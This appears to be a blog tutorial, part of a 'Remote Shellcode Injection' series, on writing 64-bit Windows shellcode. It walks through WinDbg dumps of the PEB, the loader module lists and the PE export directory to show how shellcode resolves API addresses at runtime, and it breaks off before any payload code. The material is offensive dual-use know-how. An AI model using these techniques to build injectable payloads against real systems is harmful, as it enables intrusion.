Remote Shellcode Injection - 3

64-Bit Windows Shellcoding!

Environment Setup

OS: Windows 10 64-Bit

Tools:

• WinDbg: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools

Introduction

Previously we’ve been using shellcode generated by msfvenom to accomplish our objectives.
While that’s easy and effective, it doesn’t teach us anything about how shellcode actually works.
So this time round let’s try to write our own shellcode!

Writing good shellcode on the Windows platform is much more complicated than on Linux.
On Linux we can just syscall our way through everything, but that won’t work on Windows.
This is because

1. Windows doesn’t document its syscall numbers so we have to manually figure them out in a debugger
2. The syscall numbers can change on different versions of Windows, and hardcoded values will not be portable

Before getting all technical, let’s first examine the attributes of a good shellcode.

Attributes of a good shellcode

• Portable
  The shellcode should be capable of resolving addresses of APIs and libraries at runtime, and no hardcoded values should be used.
• Position Independent
  The shellcode(assembly) should know the addresses of it’s own labels at runtime.
• NULL Free
  Technically isn’t required for our purpose, but more important when used in exploitation scenarios(e.g. strcpy buffer overflow).

With these in mind, we can move on to some Windows Internals required to understand shellcoding.

Windows Internals

PEB

Every process in windows has its Process Environment Block(PEB).
PEB is a structure that stores data about the current process.
Here’s its prototype:

0:000> dt -r nt!_PEB 27d000
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y0
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 IsPackagedProcess : 0y0
   +0x003 IsAppContainer   : 0y0
   +0x003 IsProtectedProcessLight : 0y0
   +0x003 IsLongPathAwareProcess : 0y0
   +0x004 Padding0         : [4]  ""
   +0x008 Mutant           : 0xffffffff`ffffffff Void
   +0x010 ImageBaseAddress : 0x00000000`00400000 Void
   +0x018 Ldr              : 0x00007ff8`9701a4c0 _PEB_LDR_DATA
      +0x000 Length           : 0x58
      +0x004 Initialized      : 0x1 ''
      +0x008 SsHandle         : (null) 
      +0x010 InLoadOrderModuleList : _LIST_ENTRY [ 0x00000000`000e34c0 - 0x00000000`000f3c20 ]
         +0x000 Flink            : 0x00000000`000e34c0 _LIST_ENTRY [ 0x00000000`000e3330 - 0x00007ff8`9701a4d0 ]
         +0x008 Blink            : 0x00000000`000f3c20 _LIST_ENTRY [ 0x00007ff8`9701a4d0 - 0x00000000`000e3d40 ]
      +0x020 InMemoryOrderModuleList : _LIST_ENTRY [ 0x00000000`000e34d0 - 0x00000000`000f3c30 ]
         +0x000 Flink            : 0x00000000`000e34d0 _LIST_ENTRY [ 0x00000000`000e3340 - 0x00007ff8`9701a4e0 ]
         +0x008 Blink            : 0x00000000`000f3c30 _LIST_ENTRY [ 0x00007ff8`9701a4e0 - 0x00000000`000e3d50 ]
      +0x030 InInitializationOrderModuleList : _LIST_ENTRY [ 0x00000000`000e3350 - 0x00000000`000f3c40 ]
         +0x000 Flink            : 0x00000000`000e3350 _LIST_ENTRY [ 0x00000000`000e4080 - 0x00007ff8`9701a4f0 ]
         +0x008 Blink            : 0x00000000`000f3c40 _LIST_ENTRY [ 0x00007ff8`9701a4f0 - 0x00000000`000e3d60 ]
      +0x040 EntryInProgress  : (null) 
      +0x048 ShutdownInProgress : 0 ''
      +0x050 ShutdownThreadId : (null) 
   +0x020 ProcessParameters : 0x00000000`000e2a00 _RTL_USER_PROCESS_PARAMETERS
      +0x000 MaximumLength    : 0x826
      +0x004 Length           : 0x826
      +0x008 Flags            : 0x4001
      +0x00c DebugFlags       : 0
      +0x010 ConsoleHandle    : 0x00000000`00000044 Void
      +0x018 ConsoleFlags     : 0
      +0x020 StandardInput    : 0x00000000`00000050 Void
      +0x028 StandardOutput   : 0x00000000`00000054 Void
      +0x030 StandardError    : 0x00000000`00000058 Void
      +0x038 CurrentDirectory : _CURDIR
         +0x000 DosPath          : _UNICODE_STRING "C:\Users\<redacted>"
         +0x010 Handle           : 0x00000000`00000040 Void
      +0x050 DllPath          : _UNICODE_STRING ""
         +0x000 Length           : 0
         +0x002 MaximumLength    : 0
         +0x008 Buffer           : (null) 
      +0x060 ImagePathName    : _UNICODE_STRING "C:\Users\<redacted>"
         +0x000 Length           : 0x90
         +0x002 MaximumLength    : 0x92
         +0x008 Buffer           : 0x00000000`000e3048  "C:\Users\<redacted>"
      +0x070 CommandLine      : _UNICODE_STRING ""C:\Users\<redacted>" "
         +0x000 Length           : 0x96
         +0x002 MaximumLength    : 0x98
         +0x008 Buffer           : 0x00000000`000e30da  ""C:\Users\<redacted>" "
      +0x080 Environment      : 0x00000000`000e8b80 Void
      +0x088 StartingX        : 0
      +0x08c StartingY        : 0
      +0x090 CountX           : 0
      +0x094 CountY           : 0
      +0x098 CountCharsX      : 0
      +0x09c CountCharsY      : 0
      +0x0a0 FillAttribute    : 0
      +0x0a4 WindowFlags      : 1
      +0x0a8 ShowWindowFlags  : 1
      +0x0b0 WindowTitle      : _UNICODE_STRING "C:\Users\<redacted>"
         +0x000 Length           : 0x90
         +0x002 MaximumLength    : 0x92
         +0x008 Buffer           : 0x00000000`000e3172  "C:\Users\<redacted>"
      +0x0c0 DesktopInfo      : _UNICODE_STRING "Winsta0\Default"
         +0x000 Length           : 0x1e
         +0x002 MaximumLength    : 0x20
         +0x008 Buffer           : 0x00000000`000e3204  "Winsta0\Default"
      +0x0d0 ShellInfo        : _UNICODE_STRING ""
         +0x000 Length           : 0
         +0x002 MaximumLength    : 2
         +0x008 Buffer           : 0x00000000`000e3224  ""
      +0x0e0 RuntimeData      : _UNICODE_STRING ""
         +0x000 Length           : 0
         +0x002 MaximumLength    : 0
         +0x008 Buffer           : (null) 
      +0x0f0 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
         +0x000 Flags            : 0
         +0x002 Length           : 0
         +0x004 TimeStamp        : 0
         +0x008 DosPath          : _STRING ""
      +0x3f0 EnvironmentSize  : 0x1a5a
      +0x3f8 EnvironmentVersion : 5
      +0x400 PackageDependencyData : (null) 
      +0x408 ProcessGroupId   : 0x54
      +0x40c LoaderThreads    : 0
      +0x410 RedirectionDllName : _UNICODE_STRING ""
         +0x000 Length           : 0
         +0x002 MaximumLength    : 0
         +0x008 Buffer           : (null) 
      +0x420 HeapPartitionName : _UNICODE_STRING ""
         +0x000 Length           : 0
         +0x002 MaximumLength    : 0
         +0x008 Buffer           : (null) 
      +0x430 DefaultThreadpoolCpuSetMasks : (null) 
      +0x438 DefaultThreadpoolCpuSetMaskCount : 0
      +0x43c DefaultThreadpoolThreadMaximum : 0
   +0x028 SubSystemData    : (null) 
   +0x030 ProcessHeap      : 0x00000000`000e0000 Void
   +0x038 FastPebLock      : 0x00007ff8`9701a0e0 _RTL_CRITICAL_SECTION
      +0x000 DebugInfo        : 0xffffffff`ffffffff _RTL_CRITICAL_SECTION_DEBUG
         +0x000 Type             : ??
         +0x002 CreatorBackTraceIndex : ??
         +0x008 CriticalSection  : ???? 
         +0x010 ProcessLocksList : _LIST_ENTRY
         +0x020 EntryCount       : ??
         +0x024 ContentionCount  : ??
         +0x028 Flags            : ??
         +0x02c CreatorBackTraceIndexHigh : ??
         +0x02e SpareUSHORT      : ??
      +0x008 LockCount        : 0n-1
      +0x00c RecursionCount   : 0n0
      +0x010 OwningThread     : (null) 
      +0x018 LockSemaphore    : (null) 
      +0x020 SpinCount        : 0x20007d0
   +0x040 AtlThunkSListPtr : (null) 
   +0x048 IFEOKey          : (null) 
   +0x050 CrossProcessFlags : 1
   +0x050 ProcessInJob     : 0y1
   +0x050 ProcessInitializing : 0y0
   +0x050 ProcessUsingVEH  : 0y0
   +0x050 ProcessUsingVCH  : 0y0
   +0x050 ProcessUsingFTH  : 0y0
   +0x050 ProcessPreviouslyThrottled : 0y0
   +0x050 ProcessCurrentlyThrottled : 0y0
   +0x050 ProcessImagesHotPatched : 0y0
   +0x050 ReservedBits0    : 0y000000000000000000000000 (0)
   +0x054 Padding1         : [4]  ""
   +0x058 KernelCallbackTable : (null) 
   +0x058 UserSharedInfoPtr : (null) 
   +0x060 SystemReserved   : 0
   +0x064 AtlThunkSListPtr32 : 0
   +0x068 ApiSetMap        : 0x00000000`00030000 Void
   +0x070 TlsExpansionCounter : 0
   +0x074 Padding2         : [4]  ""
   +0x078 TlsBitmap        : 0x00007ff8`9701a440 Void
   +0x080 TlsBitmapBits    : [2] 0x10011
   +0x088 ReadOnlySharedMemoryBase : 0x00007ff4`fde90000 Void
   +0x090 SharedData       : (null) 
   +0x098 ReadOnlyStaticServerData : 0x00007ff4`fde90750  -> (null) 
   +0x0a0 AnsiCodePageData : 0x00007ff5`fffd0000 Void
   +0x0a8 OemCodePageData  : 0x00007ff5`fffe0228 Void
   +0x0b0 UnicodeCaseTableData : 0x00007ff5`ffff0650 Void
   +0x0b8 NumberOfProcessors : 8
   +0x0bc NtGlobalFlag     : 0
   +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER 0xffffe86d`079b8000
      +0x000 LowPart          : 0x79b8000
      +0x004 HighPart         : 0n-6035
      +0x000 u                : <anonymous-tag>
         +0x000 LowPart          : 0x79b8000
         +0x004 HighPart         : 0n-6035
      +0x000 QuadPart         : 0n-25920000000000
   +0x0c8 HeapSegmentReserve : 0x100000
   +0x0d0 HeapSegmentCommit : 0x2000
   +0x0d8 HeapDeCommitTotalFreeThreshold : 0x10000
   +0x0e0 HeapDeCommitFreeBlockThreshold : 0x1000
   +0x0e8 NumberOfHeaps    : 3
   +0x0ec MaximumNumberOfHeaps : 0x10
   +0x0f0 ProcessHeaps     : 0x00007ff8`97018d40  -> 0x00000000`000e0000 Void
   +0x0f8 GdiSharedHandleTable : (null) 
   +0x100 ProcessStarterHelper : (null) 
   +0x108 GdiDCAttributeList : 0
   +0x10c Padding3         : [4]  ""
   +0x110 LoaderLock       : 0x00007ff8`970144f8 _RTL_CRITICAL_SECTION
      +0x000 DebugInfo        : 0x00007ff8`97014978 _RTL_CRITICAL_SECTION_DEBUG
         +0x000 Type             : 0
         +0x002 CreatorBackTraceIndex : 0
         +0x008 CriticalSection  : 0x00007ff8`970144f8 _RTL_CRITICAL_SECTION
         +0x010 ProcessLocksList : _LIST_ENTRY [ 0x00000000`00000000 - 0x00000000`00000000 ]
         +0x020 EntryCount       : 0
         +0x024 ContentionCount  : 0
         +0x028 Flags            : 1
         +0x02c CreatorBackTraceIndexHigh : 0
         +0x02e SpareUSHORT      : 0
      +0x008 LockCount        : 0n-1
      +0x00c RecursionCount   : 0n0
      +0x010 OwningThread     : (null) 
      +0x018 LockSemaphore    : (null) 
      +0x020 SpinCount        : 0x4000000
   +0x118 OSMajorVersion   : 0xa
   +0x11c OSMinorVersion   : 0
   +0x120 OSBuildNumber    : 0x4a62
   +0x122 OSCSDVersion     : 0
   +0x124 OSPlatformId     : 2
   +0x128 ImageSubsystem   : 3
   +0x12c ImageSubsystemMajorVersion : 5
   +0x130 ImageSubsystemMinorVersion : 2
   +0x134 Padding4         : [4]  ""
   +0x138 ActiveProcessAffinityMask : 0xff
   +0x140 GdiHandleBuffer  : [60] 0
   +0x230 PostProcessInitRoutine : (null) 
   +0x238 TlsExpansionBitmap : 0x00007ff8`9701a420 Void
   +0x240 TlsExpansionBitmapBits : [32] 1
   +0x2c0 SessionId        : 0xd
   +0x2c4 Padding5         : [4]  ""
   +0x2c8 AppCompatFlags   : _ULARGE_INTEGER 0x0
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0
      +0x000 u                : <anonymous-tag>
         +0x000 LowPart          : 0
         +0x004 HighPart         : 0
      +0x000 QuadPart         : 0
   +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER 0x0
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0
      +0x000 u                : <anonymous-tag>
         +0x000 LowPart          : 0
         +0x004 HighPart         : 0
      +0x000 QuadPart         : 0
   +0x2d8 pShimData        : 0x00000000`00060000 Void
   +0x2e0 AppCompatInfo    : (null) 
   +0x2e8 CSDVersion       : _UNICODE_STRING ""
      +0x000 Length           : 0
      +0x002 MaximumLength    : 2
      +0x008 Buffer           : 0x00007ff4`fde907ca  ""
   +0x2f8 ActivationContextData : (null) 
   +0x300 ProcessAssemblyStorageMap : (null) 
   +0x308 SystemDefaultActivationContextData : 0x00000000`00050000 _ACTIVATION_CONTEXT_DATA
   +0x310 SystemAssemblyStorageMap : (null) 
   +0x318 MinimumStackCommit : 0
   +0x320 SparePointers    : [4] (null) 
   +0x340 SpareUlongs      : [5] 0
   +0x358 WerRegistrationData : (null) 
   +0x360 WerShipAssertPtr : (null) 
   +0x368 pUnused          : (null) 
   +0x370 pImageHeaderHash : (null) 
   +0x378 TracingFlags     : 0
   +0x378 HeapTracingEnabled : 0y0
   +0x378 CritSecTracingEnabled : 0y0
   +0x378 LibLoaderTracingEnabled : 0y0
   +0x378 SpareTracingBits : 0y00000000000000000000000000000 (0)
   +0x37c Padding6         : [4]  ""
   +0x380 CsrServerReadOnlySharedMemoryBase : 0x00007df4`f3840000
   +0x388 TppWorkerpListLock : 0
   +0x390 TppWorkerpList   : _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
      +0x000 Flink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
         +0x000 Flink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
         +0x008 Blink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
      +0x008 Blink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
         +0x000 Flink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
         +0x008 Blink            : 0x00000000`0027d390 _LIST_ENTRY [ 0x00000000`0027d390 - 0x00000000`0027d390 ]
   +0x3a0 WaitOnAddressHashTable : [128] (null) 
   +0x7a0 TelemetryCoverageHeader : (null) 
   +0x7a8 CloudFileFlags   : 0x60
   +0x7ac CloudFileDiagFlags : 0
   +0x7b0 PlaceholderCompatibilityMode : 1 ''
   +0x7b1 PlaceholderCompatibilityModeReserved : [7]  ""
   +0x7b8 LeapSecondData   : 0x00007ff5`fffc0000 _LEAP_SECOND_DATA
      +0x000 Enabled          : 0x1 ''
      +0x004 Count            : 0
      +0x008 Data             : [1] _LARGE_INTEGER 0x0
         +0x000 LowPart          : 0
         +0x004 HighPart         : 0n0
         +0x000 u                : <anonymous-tag>
         +0x000 QuadPart         : 0n0
   +0x7c0 LeapSecondFlags  : 0
   +0x7c0 SixtySecondEnabled : 0y0
   +0x7c0 Reserved         : 0y0000000000000000000000000000000 (0)
   +0x7c4 NtGlobalFlag2    : 0

As seen above, the PEB is a large and complex structure with lots of nested structures within it.
However, its complexity is also extremely useful when enumerating an application, as it helps us locate key datastructures.
The PEB itself can be found at fs:[0x30] for 32-Bit processes and gs:[0x60] for 64-Bit processes.

PEB_LDR_DATA

The address of Ldr(i’m not sure what it stands for… apparently “load” or something) is a member of the PEB struct at offset 0x18 of the PEB for 64-Bit.
Ldr has a type of PEB_LDR_DATA, which is a struct on its own.

0:000> dt -r nt!_PEB_LDR_DATA 7ff89701a4c0
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x58
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null) 
   +0x010 InLoadOrderModuleList : _LIST_ENTRY [ 0x00000000`000e34c0 - 0x00000000`000f3c20 ]
      +0x000 Flink            : 0x00000000`000e34c0 _LIST_ENTRY [ 0x00000000`000e3330 - 0x00007ff8`9701a4d0 ]
         +0x000 Flink            : 0x00000000`000e3330 _LIST_ENTRY [ 0x00000000`000e3a50 - 0x00000000`000e34c0 ]
         +0x008 Blink            : 0x00007ff8`9701a4d0 _LIST_ENTRY [ 0x00000000`000e34c0 - 0x00000000`000f3c20 ]
      +0x008 Blink            : 0x00000000`000f3c20 _LIST_ENTRY [ 0x00007ff8`9701a4d0 - 0x00000000`000e3d40 ]
         +0x000 Flink            : 0x00007ff8`9701a4d0 _LIST_ENTRY [ 0x00000000`000e34c0 - 0x00000000`000f3c20 ]
         +0x008 Blink            : 0x00000000`000e3d40 _LIST_ENTRY [ 0x00000000`000f3c20 - 0x00000000`000e4060 ]
   +0x020 InMemoryOrderModuleList : _LIST_ENTRY [ 0x00000000`000e34d0 - 0x00000000`000f3c30 ]
      +0x000 Flink            : 0x00000000`000e34d0 _LIST_ENTRY [ 0x00000000`000e3340 - 0x00007ff8`9701a4e0 ]
         +0x000 Flink            : 0x00000000`000e3340 _LIST_ENTRY [ 0x00000000`000e3a60 - 0x00000000`000e34d0 ]
         +0x008 Blink            : 0x00007ff8`9701a4e0 _LIST_ENTRY [ 0x00000000`000e34d0 - 0x00000000`000f3c30 ]
      +0x008 Blink            : 0x00000000`000f3c30 _LIST_ENTRY [ 0x00007ff8`9701a4e0 - 0x00000000`000e3d50 ]
         +0x000 Flink            : 0x00007ff8`9701a4e0 _LIST_ENTRY [ 0x00000000`000e34d0 - 0x00000000`000f3c30 ]
         +0x008 Blink            : 0x00000000`000e3d50 _LIST_ENTRY [ 0x00000000`000f3c30 - 0x00000000`000e4070 ]
   +0x030 InInitializationOrderModuleList : _LIST_ENTRY [ 0x00000000`000e3350 - 0x00000000`000f3c40 ]
      +0x000 Flink            : 0x00000000`000e3350 _LIST_ENTRY [ 0x00000000`000e4080 - 0x00007ff8`9701a4f0 ]
         +0x000 Flink            : 0x00000000`000e4080 _LIST_ENTRY [ 0x00000000`000e3a70 - 0x00000000`000e3350 ]
         +0x008 Blink            : 0x00007ff8`9701a4f0 _LIST_ENTRY [ 0x00000000`000e3350 - 0x00000000`000f3c40 ]
      +0x008 Blink            : 0x00000000`000f3c40 _LIST_ENTRY [ 0x00007ff8`9701a4f0 - 0x00000000`000e3d60 ]
         +0x000 Flink            : 0x00007ff8`9701a4f0 _LIST_ENTRY [ 0x00000000`000e3350 - 0x00000000`000f3c40 ]
         +0x008 Blink            : 0x00000000`000e3d60 _LIST_ENTRY [ 0x00000000`000f3c40 - 0x00000000`000e3a70 ]
   +0x040 EntryInProgress  : (null) 
   +0x048 ShutdownInProgress : 0 ''
   +0x050 ShutdownThreadId : (null) 

This struct is important because it holds 3 doubly linked lists, (InLoadOrderModuleList and friends).
These 3 lists are of type LIST_ENTRY, and a new node is added to the list everytime a new library is loaded by the process.
Take note of the InInitializationOrderModuleList at offset 0x30 of the Ldr.

struct LIST_ENTRY might look useless on its own, but every list is part of a larger struct of type LDR_DATA_TABLE_ENTRY.
Specifically, the InInitializationOrderModuleList is at offset 0x20 of the LDR_DATA_TABLE_ENTRY.

Let’s take the first Flink of the initorder list shown above as an example.

LDR_DATA_TABLE_ENTRY

0:000> dt nt!_LDR_DATA_TABLE_ENTRY e3350-0x20
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x00000000`000e3a50 - 0x00000000`000e34c0 ]
   +0x010 InMemoryOrderLinks : _LIST_ENTRY [ 0x00000000`000e3a60 - 0x00000000`000e34d0 ]
   +0x020 InInitializationOrderLinks : _LIST_ENTRY [ 0x00000000`000e4080 - 0x00007ff8`9701a4f0 ]
   +0x030 DllBase          : 0x00007ff8`96eb0000 Void
   +0x038 EntryPoint       : (null) 
   +0x040 SizeOfImage      : 0x1f5000
   +0x048 FullDllName      : _UNICODE_STRING "C:\WINDOWS\SYSTEM32\ntdll.dll"
   +0x058 BaseDllName      : _UNICODE_STRING "ntdll.dll"
   +0x068 FlagGroup        : [4]  "???"
   +0x068 Flags            : 0xaac4
   +0x068 PackagedBinary   : 0y0
   +0x068 MarkedForRemoval : 0y0
   +0x068 ImageDll         : 0y1
   +0x068 LoadNotificationsSent : 0y0
   +0x068 TelemetryEntryProcessed : 0y0
   +0x068 ProcessStaticImport : 0y0
   +0x068 InLegacyLists    : 0y1
   +0x068 InIndexes        : 0y1
   +0x068 ShimDll          : 0y0
   +0x068 InExceptionTable : 0y1
   +0x068 ReservedFlags1   : 0y10
   +0x068 LoadInProgress   : 0y0
   +0x068 LoadConfigProcessed : 0y1
   +0x068 EntryProcessed   : 0y0
   +0x068 ProtectDelayLoad : 0y1
   +0x068 ReservedFlags3   : 0y00
   +0x068 DontCallForThreads : 0y0
   +0x068 ProcessAttachCalled : 0y0
   +0x068 ProcessAttachFailed : 0y0
   +0x068 CorDeferredValidate : 0y0
   +0x068 CorImage         : 0y0
   +0x068 DontRelocate     : 0y0
   +0x068 CorILOnly        : 0y0
   +0x068 ChpeImage        : 0y0
   +0x068 ReservedFlags5   : 0y00
   +0x068 Redirected       : 0y0
   +0x068 ReservedFlags6   : 0y00
   +0x068 CompatDatabaseProcessed : 0y0
   +0x06c ObsoleteLoadCount : 0xffff
   +0x06e TlsIndex         : 0
   +0x070 HashLinks        : _LIST_ENTRY [ 0x00007ff8`9701a280 - 0x00007ff8`9701a280 ]
   +0x080 TimeDateStamp    : 0xe2f8ca76
   +0x088 EntryPointActivationContext : (null) 
   +0x090 Lock             : (null) 
   +0x098 DdagNode         : 0x00000000`000e3460 _LDR_DDAG_NODE
   +0x0a0 NodeModuleLink   : _LIST_ENTRY [ 0x00000000`000e3460 - 0x00000000`000e3460 ]
   +0x0b0 LoadContext      : (null) 
   +0x0b8 ParentDllBase    : (null) 
   +0x0c0 SwitchBackContext : (null) 
   +0x0c8 BaseAddressIndexNode : _RTL_BALANCED_NODE
   +0x0e0 MappingInfoIndexNode : _RTL_BALANCED_NODE
   +0x0f8 OriginalBase     : 0x00007ff8`96eb0000
   +0x100 LoadTime         : _LARGE_INTEGER 0x01d8105f`7c7a0bea
   +0x108 BaseNameHashValue : 0xf46857d4
   +0x10c LoadReason       : 0 ( LoadReasonStaticDependency )
   +0x110 ImplicitPathOptions : 0
   +0x114 ReferenceCount   : 2
   +0x118 DependentLoadFlags : 0x800
   +0x11c SigningLevel     : 0 ''

Ah! so this is the data entry for ntdll.dll!
Apart from its name, we also know the load address of the module given its DllBase member.

With this info, we can locate the base address of any modules loaded by the process.
More importantly, after locating the base address of kernel32.dll, we can invoke LoadLibraryA to load arbitrary modules.

Now the question is, how do we resolve the addresses of functions inside a module, given the module’s base address?

IMAGE_DOS_HEADER

At the start of every library/executable’s load address, there will be a header of type IMAGE_DOS_HEADER.
Take kernel32.dll as example:

0:002> lm m kernel32
Browse full module list
start             end                 module name
00007ff8`96b00000 00007ff8`96bbe000   KERNEL32   (deferred)             
0:002> dt nt!_IMAGE_DOS_HEADER 7ff896b00000
ntdll!_IMAGE_DOS_HEADER
   +0x000 e_magic          : 0x5a4d
   +0x002 e_cblp           : 0x90
   +0x004 e_cp             : 3
   +0x006 e_crlc           : 0
   +0x008 e_cparhdr        : 4
   +0x00a e_minalloc       : 0
   +0x00c e_maxalloc       : 0xffff
   +0x00e e_ss             : 0
   +0x010 e_sp             : 0xb8
   +0x012 e_csum           : 0
   +0x014 e_ip             : 0
   +0x016 e_cs             : 0
   +0x018 e_lfarlc         : 0x40
   +0x01a e_ovno           : 0
   +0x01c e_res            : [4] 0
   +0x024 e_oemid          : 0
   +0x026 e_oeminfo        : 0
   +0x028 e_res2           : [10] 0
   +0x03c e_lfanew         : 0n232

This is the old old DOS header, that contains information such as the “MZ” magic byte for programs to recognise the executable/dll file format.

At offset 0x3c is the relative offset to the new executable header, aka PE Header or as Microsoft types it, the IMAGE_NT_HEADERS.

IMAGE_NT_HEADERS

0:002> dt nt!_IMAGE_NT_HEADERS64 7ff896b00000+0n232
ntdll!_IMAGE_NT_HEADERS64
   +0x000 Signature        : 0x4550
   +0x004 FileHeader       : _IMAGE_FILE_HEADER
   +0x018 OptionalHeader   : _IMAGE_OPTIONAL_HEADER64

Note: On 64-Bit it’s called IMAGE_NT_HEADERS64.

Offset 0x18 to that is the OptionalHeader member of type IMAGE_OPTIONAL_HEADER64.
Let’s see how that can help us.

IMAGE_OPTIONAL_HEADER64

0:002> dt nt!_IMAGE_OPTIONAL_HEADER64 7ff896b00000+0n232+0x18
ntdll!_IMAGE_OPTIONAL_HEADER64
   +0x000 Magic            : 0x20b
   +0x002 MajorLinkerVersion : 0xe ''
   +0x003 MinorLinkerVersion : 0x14 ''
   +0x004 SizeOfCode       : 0x7e600
   +0x008 SizeOfInitializedData : 0x3a800
   +0x00c SizeOfUninitializedData : 0
   +0x010 AddressOfEntryPoint : 0x170d0
   +0x014 BaseOfCode       : 0x1000
   +0x018 ImageBase        : 0x00007ff8`96b00000
   +0x020 SectionAlignment : 0x1000
   +0x024 FileAlignment    : 0x200
   +0x028 MajorOperatingSystemVersion : 0xa
   +0x02a MinorOperatingSystemVersion : 0
   +0x02c MajorImageVersion : 0xa
   +0x02e MinorImageVersion : 0
   +0x030 MajorSubsystemVersion : 0xa
   +0x032 MinorSubsystemVersion : 0
   +0x034 Win32VersionValue : 0
   +0x038 SizeOfImage      : 0xbe000
   +0x03c SizeOfHeaders    : 0x400
   +0x040 CheckSum         : 0xbebbf
   +0x044 Subsystem        : 3
   +0x046 DllCharacteristics : 0x4160
   +0x048 SizeOfStackReserve : 0x40000
   +0x050 SizeOfStackCommit : 0x1000
   +0x058 SizeOfHeapReserve : 0x100000
   +0x060 SizeOfHeapCommit : 0x1000
   +0x068 LoaderFlags      : 0
   +0x06c NumberOfRvaAndSizes : 0x10
   +0x070 DataDirectory    : [16] _IMAGE_DATA_DIRECTORY

Cool, offset 0x70 of the optional header is an array called DataDirectory, that contains at most 16 entries of type IMAGE_DATA_DIRECTORY.

IMAGE_DATA_DIRECTORY

0:002> dt nt!_IMAGE_DATA_DIRECTORY 7ff896b00000+0n232+0x18+0x70
ntdll!_IMAGE_DATA_DIRECTORY
   +0x000 VirtualAddress   : 0x9a1e0
   +0x004 Size             : 0xdf0c

Each IMAGE_DATA_DIRECTORY entry is 8 bytes in total, and contains a relative address to the actual entry table in memory(from the module base address).

winint.h:
/* Directory Entries, indices into the DataDirectory array */

#define	IMAGE_DIRECTORY_ENTRY_EXPORT		0
#define	IMAGE_DIRECTORY_ENTRY_IMPORT		1
#define	IMAGE_DIRECTORY_ENTRY_RESOURCE		2
#define	IMAGE_DIRECTORY_ENTRY_EXCEPTION		3
#define	IMAGE_DIRECTORY_ENTRY_SECURITY		4
#define	IMAGE_DIRECTORY_ENTRY_BASERELOC		5
#define	IMAGE_DIRECTORY_ENTRY_DEBUG		6
#define	IMAGE_DIRECTORY_ENTRY_COPYRIGHT		7
#define	IMAGE_DIRECTORY_ENTRY_GLOBALPTR		8   /* (MIPS GP) */
#define	IMAGE_DIRECTORY_ENTRY_TLS		9
#define	IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	10
#define	IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	11
#define	IMAGE_DIRECTORY_ENTRY_IAT		12  /* Import Address Table */
#define	IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	13
#define	IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	14

In winint.h we can find the tables that each index represents.
Index 0, which is the first entry, contains the relative address to the Export Directory Table of type IMAGE_EXPORT_DIRECTORY.

IMAGE_EXPORT_DIRECTORY

WinDbg doesn’t seem to contain information regarding this type, but you can find it on any Microsoft documentation.

typedef struct _IMAGE_EXPORT_DIRECTORY 
{ 
	+0x0 DWORD Characteristics; 
	+0x4 DWORD TimeDateStamp; 
	+0x8 WORD MajorVersion; 
	+0xa WORD MinorVersion; 
	+0xc DWORD Name; 
	+0x10 DWORD Base; 
	+0x14 DWORD NumberOfFunctions; 
	+0x18 DWORD NumberOfNames; 
	+0x1c DWORD AddressOfFunctions; 
	+0x20 DWORD AddressOfNames; 
	+0x24 DWORD AddressOfNameOrdinals;
}

This structure has multiple useful fields that can aid us in resolving a function’s address.
AddressOfFunctions is a pointer to an array of addresses.
Each entry in that array contains the relative address from the module’s base address to that function’s absolute address in memory.
AddressOfNames and AddressOfNameOrdinals works the same way as AddressOfFunctions.

Below is the procedure of resolving a function’s load address:

• Iterate through the AddressOfNames array to locate desired function name. Take note of its index in the array, for example index 5.
• The same index(5) in the AddressOfNameOrdinals array will contain a new index(let’s say 15).
• That new index(15) in the AddressOfFunctions array will contain the relative address of the function.

Let’s try that in WinDbg to locate the absolute address of the 7th function in AddressOfNames.

• Dump DWORDs at the Export Directory Table:

  0:002> dd 7ff896b00000+9a1e0
  00007ff8`96b9a1e0  00000000 1a965747 00000000 0009e1d2
  00007ff8`96b9a1f0  00000001 00000661 00000661 0009a208
  00007ff8`96b9a200  0009bb8c 0009d510 0009e1f7 0009e22d
  00007ff8`96b9a210  00020080 0001b700 0005a140 000128f0
  00007ff8`96b9a220  00025640 00025650 0009e2b3 0003cce0
  00007ff8`96b9a230  0005a280 0005a2e0 00022270 0001e2c0
  00007ff8`96b9a240  0003a620 000208a0 0003a640 00038a40
  00007ff8`96b9a250  0009e3ec 0009e42c 00007200 00025290

  At offset 0x20 is the pointer to AddressOfNames array.

• Dump DWORDs at the AddressOfNames array:

  0:002> dd 7ff896b00000+9bb8c
  00007ff8`96b9bb8c  0009e1df 0009e218 0009e24b 0009e25a
  00007ff8`96b9bb9c  0009e26f 0009e278 0009e281 0009e292
  00007ff8`96b9bbac  0009e2a3 0009e2e8 0009e30e 0009e32d
  00007ff8`96b9bbbc  0009e34c 0009e359 0009e36c 0009e384
  00007ff8`96b9bbcc  0009e39f 0009e3b4 0009e3d1 0009e410
  00007ff8`96b9bbdc  0009e451 0009e464 0009e471 0009e48b
  00007ff8`96b9bbec  0009e4a9 0009e4e0 0009e525 0009e570
